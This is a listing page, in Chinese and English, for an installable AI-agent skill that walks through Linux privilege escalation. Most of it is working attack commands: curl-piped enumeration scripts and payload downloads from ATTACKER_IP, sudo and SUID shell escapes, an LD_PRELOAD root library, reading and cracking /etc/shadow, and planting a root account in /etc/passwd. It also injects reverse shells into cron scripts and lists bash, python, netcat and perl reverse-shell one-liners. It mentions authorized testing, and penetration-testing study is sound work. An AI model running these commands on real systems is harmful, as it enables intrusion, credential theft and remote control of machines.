Linux权限提升完整指南：从枚举到Root访问的系统性渗透测试方法

linux-privilege-escalation by sickn33/antigravity-awesome-skills

97 周安装量

27,100 GitHub Stars

GitHub

安装命令

npx skills add https://github.com/sickn33/antigravity-awesome-skills --skill linux-privilege-escalation

系统管理测试安全

🇨🇳中文介绍

Linux 权限提升

目的

在 Linux 系统上执行系统性的权限提升评估，以识别和利用配置错误、存在漏洞的服务以及安全弱点，从而实现从低权限用户访问提升到 root 级别控制。此技能支持对内核漏洞、sudo 配置错误、SUID 二进制文件、cron 作业、capabilities、PATH 劫持和 NFS 弱点进行全面枚举和利用。

输入 / 前提条件

所需访问权限

对目标 Linux 系统的低权限 shell 访问
能够执行命令（交互式或半交互式 shell）
用于反向 shell 连接的网络访问（如果需要）
用于托管有效负载和接收 shell 的攻击者机器

技术要求

了解 Linux 文件系统权限和所有权
熟悉常见的 Linux 实用程序和脚本编写
了解内核版本及相关漏洞
基本了解编译（gcc）以用于自定义漏洞利用

输出 / 交付成果

主要输出

目标系统上的 root shell 访问权限
权限提升路径文档
系统枚举结果报告
修复建议

证据工件

成功权限提升的截图
证明 root 访问权限的命令输出日志
已识别的漏洞详细信息
被利用的配置文件

核心工作流程

阶段 1：系统枚举

基本系统信息

收集基本的系统详细信息以进行漏洞研究：

# 主机名和系统角色
hostname

# 内核版本和架构
uname -a

# 详细的内核信息
cat /proc/version

# 操作系统详细信息
cat /etc/issue
cat /etc/*-release

# 架构
arch

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

阶段 2：自动枚举

部署自动化脚本进行全面枚举：

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh

将脚本传输到目标系统：

# 在攻击者机器上
python3 -m http.server 8000

# 在目标机器上
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

阶段 3：内核漏洞利用

uname -r
cat /proc/version

# 使用 Linux Exploit Suggester
./linux-exploit-suggester.sh

# 在 exploit-db 上手动搜索
searchsploit linux kernel [version]

常见内核漏洞利用

内核版本	漏洞利用	CVE
2.6.x - 3.x	Dirty COW	CVE-2016-5195
4.4.x - 4.13.x	Double Fetch	CVE-2017-16995
5.8+	Dirty Pipe	CVE-2022-0847

# 传输漏洞利用源代码
wget http://ATTACKER_IP/exploit.c

# 在目标上编译
gcc exploit.c -o exploit

# 执行
./exploit

阶段 4：Sudo 利用

GTFOBins Sudo 利用

参考 https://gtfobins.github.io 获取利用命令：

# 示例：使用 sudo 的 vim
sudo vim -c ':!/bin/bash'

# 示例：使用 sudo 的 find
sudo find . -exec /bin/sh \; -quit

# 示例：使用 sudo 的 awk
sudo awk 'BEGIN {system("/bin/bash")}'

# 示例：使用 sudo 的 python
sudo python -c 'import os; os.system("/bin/bash")'

# 示例：使用 sudo 的 less
sudo less /etc/passwd
!/bin/bash

当 env_keep 包含 LD_PRELOAD 时：

// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}



# 编译共享库
gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# 使用 sudo 执行
sudo LD_PRELOAD=/tmp/shell.so find

阶段 5：SUID 二进制文件利用

查找 SUID 二进制文件

find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

利用 SUID 二进制文件

参考 GTFOBins 获取 SUID 利用方法：

# 示例：用于文件读取的 base64
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d

# 示例：用于文件写入的 cp
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p

# 示例：具有 SUID 的 find
find . -exec /bin/sh -p \; -quit

通过 SUID 进行密码破解

# 读取 shadow 文件（如果 base64 具有 SUID）
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt

# 在攻击者机器上
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

将用户添加到 passwd（如果 nano/vim 具有 SUID）

# 生成密码哈希
openssl passwd -1 -salt new newpassword

# 添加到 /etc/passwd（使用 SUID 编辑器）
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

阶段 6：Capabilities 利用

getcap -r / 2>/dev/null

# 示例：具有 cap_setuid 的 python
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# 示例：具有 cap_setuid 的 vim
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'

# 示例：具有 cap_setuid 的 perl
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

阶段 7：Cron 作业利用

# 系统 crontab
cat /etc/crontab

# 用户 crontabs
ls -la /var/spool/cron/crontabs/

# Cron 目录
ls -la /etc/cron.*

# Systemd 定时器
systemctl list-timers

利用可写的 Cron 脚本

# 从 /etc/crontab 中识别可写的 cron 脚本
ls -la /opt/backup.sh        # 检查权限
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

# 如果 cron 引用可写 PATH 中不存在的脚本
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh

阶段 8：PATH 劫持

# 查找调用外部命令的 SUID 二进制文件
strings /usr/local/bin/suid-binary
# 显示：system("service apache2 start")

# 通过在可写 PATH 中创建恶意二进制文件进行劫持
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary      # 执行 SUID 二进制文件

阶段 9：NFS 利用

# 在目标上 - 查找 no_root_squash 选项
cat /etc/exports

# 在攻击者上 - 挂载共享并创建 SUID 二进制文件
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs

# 创建并编译 SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell

# 在目标上 - 执行
/share/shell

目的	命令
内核版本	`uname -a`
当前用户	`id`
Sudo 权限	`sudo -l`
SUID 文件	`find / -perm -u=s -type f 2>/dev/null`
Capabilities	`getcap -r / 2>/dev/null`
Cron 作业	`cat /etc/crontab`
可写目录	`find / -writable -type d 2>/dev/null`
NFS 导出	`cat /etc/exports`

反向 Shell 单行命令

# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Netcat
nc -e /bin/bash ATTACKER_IP 4444

# Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'

约束和防护措施

在生产使用前在测试环境中验证内核漏洞利用
失败的内核漏洞利用可能导致系统崩溃
记录权限提升期间所做的所有更改
仅在授权范围内维持访问持久性

现代内核可能具有漏洞利用缓解措施（ASLR、SMEP、SMAP）
AppArmor/SELinux 可能限制利用技术
容器环境限制内核级漏洞利用
强化系统可能具有受限的 sudo 配置

法律和道德要求

测试前需要书面授权
保持在定义的范围内
立即报告关键发现
不访问超出范围要求的数据

示例 1：通过 find 从 Sudo 提升到 Root

场景：用户对 find 命令具有 sudo 权限

$ sudo -l
User user may run the following commands:
    (root) NOPASSWD: /usr/bin/find

$ sudo find . -exec /bin/bash \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)

示例 2：通过 SUID base64 访问 Shadow

场景：base64 二进制文件设置了 SUID 位

$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64

$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::

# 使用 john 离线破解
$ john --wordlist=rockyou.txt shadow.txt

示例 3：Cron 作业脚本劫持

场景：Root cron 作业执行可写脚本

$ cat /etc/crontab
* * * * * root /opt/scripts/backup.sh

$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh

$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh

# 等待 1 分钟
$ /tmp/bash -p
# id
uid=1000(user) gid=1000(user) euid=0(root)

问题	解决方案
漏洞利用编译失败	检查 gcc：`which gcc`；在攻击者机器上为相同架构编译；使用 `gcc -static`
反向 shell 未连接	检查防火墙；尝试端口 443/80；使用分阶段有效负载；检查出口过滤
SUID 二进制文件无法利用	验证版本是否与 GTFOBins 匹配；检查 AppArmor/SELinux；某些二进制文件会丢弃权限
Cron 作业未执行	验证 cron 是否运行：`service cron status`；检查 +x 权限；验证 crontab 中的 PATH

此技能适用于执行概述中描述的工作流程或操作。

🇺🇸English

Linux Privilege Escalation

Purpose

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.

Inputs / Prerequisites

Required Access

Low-privilege shell access to target Linux system
Ability to execute commands (interactive or semi-interactive shell)
Network access for reverse shell connections (if needed)
Attacker machine for payload hosting and receiving shells

Technical Requirements

Understanding of Linux filesystem permissions and ownership
Familiarity with common Linux utilities and scripting
Knowledge of kernel versions and associated vulnerabilities
Basic understanding of compilation (gcc) for custom exploits

Recommended Tools

LinPEAS, LinEnum, or Linux Smart Enumeration scripts
Linux Exploit Suggester (LES)
GTFOBins reference for binary exploitation
John the Ripper or Hashcat for password cracking
Netcat or similar for reverse shells

Outputs / Deliverables

Primary Outputs

Root shell access on target system
Privilege escalation path documentation
System enumeration findings report
Recommendations for remediation

Evidence Artifacts

Screenshots of successful privilege escalation
Command output logs demonstrating root access
Identified vulnerability details
Exploited configuration files

Core Workflow

Phase 1: System Enumeration

Basic System Information

Gather fundamental system details for vulnerability research:

# Hostname and system role
hostname

# Kernel version and architecture
uname -a

# Detailed kernel information
cat /proc/version

# Operating system details
cat /etc/issue
cat /etc/*-release

# Architecture
arch

User and Permission Enumeration

# Current user context
whoami
id

# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false

# Users with home directories
cat /etc/passwd | grep home

# Group memberships
groups

# Other logged-in users
w
who

Network Information

# Network interfaces
ifconfig
ip addr

# Routing table
ip route

# Active connections
netstat -antup
ss -tulpn

# Listening services
netstat -l

Process and Service Enumeration

# All running processes
ps aux
ps -ef

# Process tree view
ps axjf

# Services running as root
ps aux | grep root

Environment Variables

# Full environment
env

# PATH variable (for hijacking)
echo $PATH

Phase 2: Automated Enumeration

Deploy automated scripts for comprehensive enumeration:

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh

Transfer scripts to target system:

# On attacker machine
python3 -m http.server 8000

# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Phase 3: Kernel Exploits

Identify Kernel Version

uname -r
cat /proc/version

Search for Exploits

# Use Linux Exploit Suggester
./linux-exploit-suggester.sh

# Manual search on exploit-db
searchsploit linux kernel [version]

Common Kernel Exploits

Kernel Version	Exploit	CVE
2.6.x - 3.x	Dirty COW	CVE-2016-5195
4.4.x - 4.13.x	Double Fetch	CVE-2017-16995
5.8+	Dirty Pipe	CVE-2022-0847

Compile and Execute

# Transfer exploit source
wget http://ATTACKER_IP/exploit.c

# Compile on target
gcc exploit.c -o exploit

# Execute
./exploit

Phase 4: Sudo Exploitation

Enumerate Sudo Privileges

sudo -l

GTFOBins Sudo Exploitation

Reference https://gtfobins.github.io for exploitation commands:

# Example: vim with sudo
sudo vim -c ':!/bin/bash'

# Example: find with sudo
sudo find . -exec /bin/sh \; -quit

# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'

# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'

# Example: less with sudo
sudo less /etc/passwd
!/bin/bash

LD_PRELOAD Exploitation

When env_keep includes LD_PRELOAD:

// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}



# Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find

Phase 5: SUID Binary Exploitation

Find SUID Binaries

find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Exploit SUID Binaries

Reference GTFOBins for SUID exploitation:

# Example: base64 for file reading
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d

# Example: cp for file writing
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p

# Example: find with SUID
find . -exec /bin/sh -p \; -quit

Password Cracking via SUID

# Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt

# On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Add User to passwd (if nano/vim has SUID)

# Generate password hash
openssl passwd -1 -salt new newpassword

# Add to /etc/passwd (using SUID editor)
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Phase 6: Capabilities Exploitation

Enumerate Capabilities

getcap -r / 2>/dev/null

Exploit Capabilities

# Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'

# Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

Phase 7: Cron Job Exploitation

Enumerate Cron Jobs

# System crontab
cat /etc/crontab

# User crontabs
ls -la /var/spool/cron/crontabs/

# Cron directories
ls -la /etc/cron.*

# Systemd timers
systemctl list-timers

Exploit Writable Cron Scripts

# Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh        # Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

# If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh

Phase 8: PATH Hijacking

# Find SUID binary calling external command
strings /usr/local/bin/suid-binary
# Shows: system("service apache2 start")

# Hijack by creating malicious binary in writable PATH
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary      # Execute SUID binary

Phase 9: NFS Exploitation

# On target - look for no_root_squash option
cat /etc/exports

# On attacker - mount share and create SUID binary
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs

# Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell

# On target - execute
/share/shell

Quick Reference

Enumeration Commands Summary

Purpose	Command
Kernel version	`uname -a`
Current user	`id`
Sudo rights	`sudo -l`
SUID files	`find / -perm -u=s -type f 2>/dev/null`
Capabilities	`getcap -r / 2>/dev/null`
Cron jobs	`cat /etc/crontab`

Reverse Shell One-Liners

# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Netcat
nc -e /bin/bash ATTACKER_IP 4444

# Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'

Key Resources

GTFOBins: https://gtfobins.github.io
LinPEAS: https://github.com/carlospolop/PEASS-ng
Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester

Constraints and Guardrails

Operational Boundaries

Verify kernel exploits in test environment before production use
Failed kernel exploits may crash the system
Document all changes made during privilege escalation
Maintain access persistence only as authorized

Technical Limitations

Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
AppArmor/SELinux may restrict exploitation techniques
Container environments limit kernel-level exploits
Hardened systems may have restricted sudo configurations

Legal and Ethical Requirements

Written authorization required before testing
Stay within defined scope boundaries
Report critical findings immediately
Do not access data beyond scope requirements

Examples

Example 1: Sudo to Root via find

Scenario : User has sudo rights for find command

$ sudo -l
User user may run the following commands:
    (root) NOPASSWD: /usr/bin/find

$ sudo find . -exec /bin/bash \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)

Example 2: SUID base64 for Shadow Access

Scenario : base64 binary has SUID bit set

$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64

$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::

# Crack offline with john
$ john --wordlist=rockyou.txt shadow.txt

Example 3: Cron Job Script Hijacking

Scenario : Root cron job executes writable script

$ cat /etc/crontab
* * * * * root /opt/scripts/backup.sh

$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh

$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh

# Wait 1 minute
$ /tmp/bash -p
# id
uid=1000(user) gid=1000(user) euid=0(root)

Troubleshooting

Issue	Solutions
Exploit compilation fails	Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static`
Reverse shell not connecting	Check firewall; try ports 443/80; use staged payloads; check egress filtering
SUID binary not exploitable	Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges
Cron job not executing	Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab

When to Use

This skill is applicable to execute the workflow or actions described in the overview.

Weekly Installs

Repository

sickn33/antigra…e-skills

GitHub Stars

27.1K

First Seen

Feb 21, 2026

Security Audits

Gen Agent Trust HubFail SocketWarn SnykFail

Installed on

opencode96

cursor94

github-copilot94

amp94

codex94

kimi-cli94

Azure PostgreSQL 无密码身份验证配置指南：Entra ID 迁移与访问管理

34,800 周安装